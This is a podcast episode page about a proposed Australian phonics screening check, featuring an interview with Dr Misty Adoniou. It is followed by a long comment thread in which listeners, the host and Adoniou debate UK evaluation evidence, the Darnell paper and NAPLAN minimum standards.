[soundcloud url="https://api.soundcloud.com/tracks/308479091" params="color=ff5500&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false" width="100%" height="166" iframe="true" /]
Main Feature: Dr. Misty Adoniou discusses the implications of a nationwide mandatory phonics assessment, and the relationship between phonics and broader literacy instruction.
Regular Features: Dan Haesler asks “When should teachers speak up?” in a new Off Campus; Education in the news – Cameron discusses recent stories about Special Religious Instruction in schools.
Timecodes & Links:
00:00 Opening Credits
01:19 Intro – Principal’s Wellbeing Survey
05:41 Off Campus – Dan Haesler
14:51 Scripture in Schools
31:48 Feature Introduction
34:28 Interview – Dr Misty Adoniou
1:04:11 Quote & Sign Off
Very disappointed in the one-sided argument and message about phonics as described by Misty. Why was the conversation presented in such a biased way? Could you not have balanced the discussion with someone who supports the phonics screening test?
Misty referred to the concept of phonics in a very generalised way and claimed that all teachers in all the classrooms she visited teach phonics. Why was there no discussion about the different types of phonics (analytical or synthetic) and the differences between implicit teaching of phonics and systematic direct teaching of phonics?
Furthermore Misty implies that teaching phonics is not important, which undermines any discussion of the understanding teachers should have of phonemic awareness. There is an overwhelming amount of scientific evidence explaining children’s difficulties with letter–sound correspondences when they have little awareness of sounds in spoken language. And this is not just an insignificant sprinkling of children that teachers do not have to worry about: 10 percent of the population will have difficulty reading and writing. And guess what? For all of Misty’s banter about children not being able to achieve reading comprehension, NO child who cannot make letter–sound correspondences will ever keep up with their classmates in comprehending text, especially when they hit secondary school, not to mention when they hit grade three, where the dogmatic approach in this country is that we now only instruct children to read to learn, not learn to read.
Yes, comprehension is important; it is the ultimate goal of successful reading.
I challenge you to have a wider discussion: discuss Gough and Tunmer’s (1986) Simple View of Reading.
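For anyone who hasn’t come across it, the Simple View in its usual formulation models reading comprehension as the product of two components:
Reading Comprehension = Decoding × Language Comprehension
so if either component is near zero, comprehension is near zero, no matter how strong the other component is.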
Thanks for your message.
As stated in the introduction to the interview, and again at the start of the interview, and again in the wrap-up after the interview, this discussion was about a mandatory, teacher-delivered, phonics-only literacy assessment. It was not an attempt to capture all of the nuance of the issues of literacy instruction; the broader discussion of phonics and literacy was intended to bring a bit of context to that issue.
It would be almost impossible for a single interview or podcast episode to capture all perspectives on any issue, as the format of our program is to focus primarily on long-format interviews with an individual – although over time we may interview multiple people on related topics in order to invite different perspectives.
Thanks Danielle for taking the time to listen to the podcast and to share your passion for teaching children to read. It is a passion I share with you 🙂
One of your comments stands out as needing some correction. ‘Furthermore Misty implies that teaching phonics is not important’.
I never imply that, in fact I state that teaching phonics is important. More than ‘important’, I state that it is ‘necessary’.
Hi Misty.
Just two quick questions that came out of listening to this interview : )
In your interview you say that following the 2012 implementation of the phonics test in the U.K, students showed improvements in phonics (as would be expected), but that there’s no evidence for an improvement in reading or writing. I found this paper by the U.K government which, on page 5, has two figures that show improvement in both reading and writing over this time period. Have you seen this paper before? If so, is there a reason why you don’t think it’s valid evidence? I’d love to hear your thoughts. Source: https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/463002/SFR32_KS1_2015_Text.pdf
Decisions like whether or not to implement a national phonics check are always made in a climate of uncertainty. It’s impossible for us to know whether the phonics check will have an overwhelmingly positive or negative effect on our students, so what we need to do is determine the most likely outcome of implementing such a check and compare that to the associated cost. I guess my second question is: ‘What evidence, if any, would convince you that implementing the proposed phonics check in Australia would most likely be a cost-effective investment?’ PIRLS results from 2016 are due out on Dec 5th 2017; if they show a significant increase in literacy skills for students in England, when compared to the 2011 PIRLS results, would you change your mind?
Just to re-cap those two questions.
1: Why do you think that the evidence for the success of the U.K phonics check isn’t valid? (as found on page 5, in the url above). Sorry if I’ve missed something obvious here.
2: If you do think that the above evidence isn’t valid, what would be your criteria for research that could be considered valid in relation to us making the assessment that, on the balance of evidence, implementing such a phonics check in Australia would be a worthwhile investment?
I really appreciate any time you have to answer these questions.
Thanks so much, I very much enjoyed listening to the interview.
Ollie.
Hi Ollie
Thanks for your thoughtful questions on this very hot topic.
The link you provide – a government advertorial – cites clear evidence that children get better at taking the phonics screening test. It also states there were no improvements in reading, and only a 1% improvement in writing.
The full evaluation report of the phonics screening check that was commissioned by the UK Dept of Education itself is unequivocal – there is NO evidence of any improvement in literacy skills.
https://www.nfer.ac.uk/publications/YOPC03/YOPC03.pdf
So why do it? I get that it was introduced with every good intention – to improve literacy skills. But when an experiment doesn’t work we need to know when to throw in the towel. It has been an expensive experiment for the UK – about AUD 1,400,000 in start-up costs and ongoing costs of about $600,000 a year. They have not reaped any returns – literacy skills have not improved. In many ways it has been a perfect experiment for Australia to observe – somebody else has spent the money, and we should learn from their findings.
The evaluation also found that the test did not tell teachers anything they didn’t already know. It didn’t identify children they didn’t already know were struggling. And it would appear that even though teachers now had information on which sounds the children didn’t know – and could work with them intensively so that they could pass the phonics test at the end of the year – the children still didn’t get better at reading and writing.
As it turns out, the test itself has been found to be an invalid test of phonic knowledge. http://onlinelibrary.wiley.com/doi/10.1002/berj.3269/abstract
Ollie, in Australia we have less than 5% of students below the literacy benchmark as measured by NAPLAN. We know exactly who they are, and these are the children who require our attention. And if Gonski had been applied as it was intended – where money was attached to identified children, and we were all then held accountable for the outcomes of those identified children – rather than handed out like lollies to systems who use it to implement ineffectual ‘system’ initiatives – then we’d have a chance of ‘fixing’ the 5%.
A phonics screening check has not ‘fixed’ the 5% in the UK and it won’t ‘fix’ it here either.
Misty
* less than 5% at Year 3
It doubles at each NAPLAN after that – further evidence that we are sliding down the literacy test slide not because our children can’t read the basics, it is because they can’t read the complex.
Hi Misty.
Thanks for your thoughtful reply!
In reference to your comment about the gov’t editorial that I cited, you stated that it “states there were no improvements in reading, and only a 1% improvement in writing”. This is true, but those figures refer only to the growth from 2014 to 2015. There was significant growth from 2012 to 2015 in both reading (between 3 and 5%) and writing (between 4 and 5%). Just thought that clarification was important.
But in regards to the full evaluation report that you pointed me to – thanks very much for this – I agree that the result there is ‘no measurable effect’. The line in particular stating this was the following: “the evidence suggests that the introduction of the check has had an impact on pupils’ attainment in phonics, but not (or not yet) on their attainment in literacy.” (p. 10) Source: Phonics Screening Check Evaluation, Final Report, Department for Education (UK), 2015. https://www.nfer.ac.uk/publications/YOPC03/YOPC03.pdf
Regarding the Darnell, C. A., Solity, J. E., & Wall, H. (2017) paper, it seems a bit of a stretch of the authors’ argument that the phonics test is invalid because “15 GPCs accounted for 67% of all GPC occurrences, with 27 of the 85 specified GPCs (31.8%) not appearing at all”, as no test tests all knowledge in a realm. But I’m clearly out of my depth when it comes to the ins and outs of phonics, so this was just a surface impression.
Really appreciate your reply and it’s given me a great springboard into some of the evidence cited against implementation of the national phonics check. I’ll continue to explore!
Best.
Ollie.
One more quick thing Misty, do you have a reference for your NAPLAN stats? They come as a bit of a surprise.
Thanks heaps 🙂
Ollie.
Were you able to read the full Darnell paper, Ollie? I know that these papers are frustratingly kept behind paywalls and I don’t know where you work and what access you have. Its point is that if you are going to test phonics, then you need to test phonics. The phonics screening check tests a seemingly random selection of phoneme/grapheme correspondences, hence its validity as a predictor of reading difficulties, or as preparation for reading interventions, becomes equally random. This is probably why the test only manages to improve student performance on the test.
The NAPLAN results are all on the NAPLAN site – you can read the full 2016 report and see the results there. 5% is the mean across the states and territories at Year 3. It is much higher in the NT and Tasmania but lower in the other states. Our money should be spent on interventions for that small percentage, rather than on rollouts of further testing regimes for the entire population. At some stage we surely have to start feeding the pig, instead of constantly putting it on the scales!
Hi again Misty. I’ve taken a while to reply as I wanted to have a good think and do a bit of research. Here’s what I found.
I read the Darnell paper, and I sent it off to a speech pathologist for their impression as well. They echoed my thoughts regarding the fact that it argues against a straw man. The Phonics Check is designed as just that, a check; it never claims to cover all of the 85 grapheme–phoneme correspondences. As with all assessments, it’s necessary to balance the need to gain an accurate picture of a student’s competency against the inherent constraints (primarily time and cost). It wouldn’t be practical (or necessary) to test all of the GPCs to determine whether or not a student is struggling with phonemic awareness.
As for the claim that only 5% of Year 3 students are below the literacy benchmark, and that this shows that “we are sliding down the literacy test slide not because our children can’t read the basics, it is because they can’t read the complex”, it took me quite a while to get to the bottom of this, and I had to email ACARA about it.
The first thing that I found was that the statistic you’re quoting relates to the ‘National Minimum Standard’ (i.e., 5% of Year 3 students are below the NMS, which is true). I emailed ACARA and asked how this NMS is derived and how it can be interpreted; this is what they said:
“The NMS for each year level was determined prior to ACARA’s existence, so we do not have ready access to the documentation that would have been developed around their determination. However, we understand that the current NMSs were determined by measurement experts, from analysis of the benchmarks that were in place in each of the states’ and territories’ testing programs pre-NAPLAN.
We are aware that the NMS is a very low standard, compared to the more proficient standards set for other testing programs. ACARA is currently undertaking research to determine more challenging standards. This is still in the research phase, and it has yet to be determined when additional standards might be implemented.”
So to suggest that, because only 5% of Year 3 students are below the NMS, we don’t have a problem in early years literacy is perhaps a bit of a stretch. I actually asked ACARA the following question explicitly:
“what does this mean regarding how much this ‘National Minimum Standard’ tells us about student achievement? Would it be fair, for example, for me to state that in Australia, we have less than 5% of students (Year 3 students) under literacy benchmark as measured by NAPLAN, therefore we have evidence that we are sliding down the literacy test slide not because our children can’t read the basics, it is because they can’t read the complex?”
This was their answer:
“The inference you have drawn in your email, while seemingly logical, cannot be confirmed by NAPLAN data, as there is no verified relationship between NAPLAN and the testing programs to which you are likely referring (PISA, TIMMS, PIRLS).”
So, bringing that all together (along with our above few posts):
1. The article from the DoE (UK) states that “the evidence suggests that the introduction of the check has had an impact on pupils’ attainment in phonics, but not (or not yet) on their attainment in literacy” (p. 10). This is an interesting result and an important one. Thanks for sharing that.
2. I wouldn’t place a whole heap of weight on the Darnell report as it appears to be arguing that the PC is not doing something that it never claimed to be doing (the straw man).
3. It doesn’t appear to be fair to claim that NAPLAN suggests that only 5% of our Year 3 students are not where they should be, because, as the ACARA email states, “the NMS is a very low standard”. Further clouding the issue, ACARA themselves can’t actually tell us exactly what the NMS means or how it was derived. Perhaps this is evidence that we need more refined testing to see where our students are at?
It’s obviously a very complex issue. But at this point I don’t feel that I’ve seen sufficient evidence to convince me that it’s either a no-brainer good investment or a likely waste of money. I’ll continue to explore.
Thanks for sharing all of these resources Misty, I’ve enjoyed delving into this and would love any further info you have to share.
Best.
Ollie.